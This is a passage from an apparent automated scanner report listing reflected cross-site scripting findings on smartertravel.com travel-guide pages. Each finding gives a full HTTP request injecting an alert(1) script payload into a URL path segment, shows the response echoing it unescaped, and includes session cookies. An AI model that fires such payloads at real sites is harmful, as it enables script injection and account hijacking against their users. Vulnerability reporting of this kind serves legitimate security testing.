Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:07:04 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesa096c<script>alert(1)</script>90f590f9443/lexington-travel-guide.html</p>
...[SNIP]...

2.68. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/lexington-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4617<script>alert(1)</script>c98f5596a81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/lexington-travel-guide.htmle4617<script>alert(1)</script>c98f5596a81 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:07:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:07:06 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:07:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:07:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/lexington-travel-guide.htmle4617<script>alert(1)</script>c98f5596a81</p>
...[SNIP]...

2.69. http://www.smartertravel.com/travel-guides/london-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/london-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84c97<script>alert(1)</script>b062e521dea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides84c97<script>alert(1)</script>b062e521dea/london-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:56:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:55 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:55 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:56:55 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides84c97<script>alert(1)</script>b062e521dea/london-travel-guide.html</p>
...[SNIP]...

2.70. http://www.smartertravel.com/travel-guides/london-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/london-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b049d<script>alert(1)</script>5ecc6c6aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/london-travel-guide.htmlb049d<script>alert(1)</script>5ecc6c6aca3 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:57:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:01 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:57:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/london-travel-guide.htmlb049d<script>alert(1)</script>5ecc6c6aca3</p>
...[SNIP]...

2.71. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/louisville-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bab38<script>alert(1)</script>f0ebd2dc36f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesbab38<script>alert(1)</script>f0ebd2dc36f/louisville-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:45 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:55:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesbab38<script>alert(1)</script>f0ebd2dc36f/louisville-travel-guide.html</p>
...[SNIP]...

2.72. http://www.smartertravel.com/travel-guides/louisville-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/louisville-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bff89<script>alert(1)</script>f9bd78167ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/louisville-travel-guide.htmlbff89<script>alert(1)</script>f9bd78167ad HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:57:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:59 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:59 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:57:59 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/louisville-travel-guide.htmlbff89<script>alert(1)</script>f9bd78167ad</p>
...[SNIP]...

2.73. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/miami-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ad3f<script>alert(1)</script>5642a12ec17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides1ad3f<script>alert(1)</script>5642a12ec17/miami-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:16 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:53:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides1ad3f<script>alert(1)</script>5642a12ec17/miami-travel-guide.html</p>
...[SNIP]...

2.74. http://www.smartertravel.com/travel-guides/miami-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/miami-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 139db<script>alert(1)</script>ce54cf089f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/miami-travel-guide.html139db<script>alert(1)</script>ce54cf089f9 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:22 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:53:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/miami-travel-guide.html139db<script>alert(1)</script>ce54cf089f9</p>
...[SNIP]...

2.75. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/orlando-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11ae6<script>alert(1)</script>6a92b3f9f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides11ae6<script>alert(1)</script>6a92b3f9f9d/orlando-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:52 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:54:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides11ae6<script>alert(1)</script>6a92b3f9f9d/orlando-travel-guide.html</p>
...[SNIP]...

2.76. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/orlando-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8afb8<script>alert(1)</script>3aad907230c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/orlando-travel-guide.html8afb8<script>alert(1)</script>3aad907230c HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:24 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:24 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:55:24 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
